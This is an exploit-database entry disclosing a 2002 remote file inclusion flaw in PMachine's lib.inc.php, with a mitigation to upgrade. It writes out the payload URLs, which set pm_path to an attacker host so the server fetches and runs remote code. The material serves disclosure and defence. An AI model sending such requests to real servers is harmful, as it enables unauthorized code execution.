header-logo
Suggest Exploit
vendor:
PMachine
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Command Execution
94
CWE
Product Name: PMachine
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

PMachine Remote Command Execution Vulnerability

It has been reported that PMachine does not properly handle include files under some circumstances. Because of this, an attacker may be able to remotely execute commands. An attacker can send a malicious request to the vulnerable server, such as http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=.txt with http://attacker.example.com/config.txt or http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt with http://attacker.example.com/config/badcode.txt, which can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Upgrade to the latest version of PMachine, which is not vulnerable to this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7919/info

It has been reported that PMachine does not properly handle include files under some circumstances. Because of this, an attacker may be able to remotely execute commands.

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=.txt with:

http://attacker.example.com/config.txt

or

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt with:

http://attacker.example.com/config/badcode.txt

Navigation

Suggest Exploit

Services By CQR